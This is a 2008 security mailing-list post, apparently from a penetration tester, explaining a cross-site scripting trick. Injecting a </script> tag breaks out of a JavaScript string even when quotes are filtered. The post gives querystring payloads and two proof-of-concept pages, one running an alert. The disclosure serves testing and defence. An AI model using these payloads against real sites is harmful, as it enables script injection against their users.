WebApp Sec
mailing list archives
Script Tag Breakout
From: "Nick Von Dadelszen" <nvondad () gmail com>
Date: Mon, 20 Oct 2008 14:34:25 +1300
Hey all,
Not sure if this is a known issue or not but thought I would share.
It's not a common situation to occur but I've used it a couple of times
in the last couple of years while testing apps.
-- Description --
Able to break out of a string variable without using quotes through
the use of a </script> tag.
For example, if the code of a page does the following:
<script>
somestring = "[your querystring here]";
</script>
You would normally break out of this with the following
querystring=";[code here]
If the code checks for a double or single quote and removes it, you
cannot normally break out of this code. However, you are able to
close the current script tag, even from within a string variable. So,
the following two breakouts work:
querystring=</script>[HTML here]
querystring=</script><script>[javascript here]</script>
The resulting code looks something like the following:
<html>
<body>
<h1>Script Tag Breakout PoC</h1>
<script>
string = "</script><h1>Parsed HTML Code Here</h1><!--";
</script>
</body>
</html>
Or:
<html>
<body>
<h1>Script Tag Breakout PoC</h1>
<script>
string = "</script><script>alert(document.location);</script>";
</script>
</body>
</html>
In the above HTML, the javascript alert function is called regardless
of it being contained within a string variable.
-- Tested Browsers --
All versions of IE and Firefox up to and including IE 7 and Firefox 3.
---------------------------------------------------------
Nick von Dadelszen
Lateral Security
www.lateralsecurity.com
---------------------------------------------------------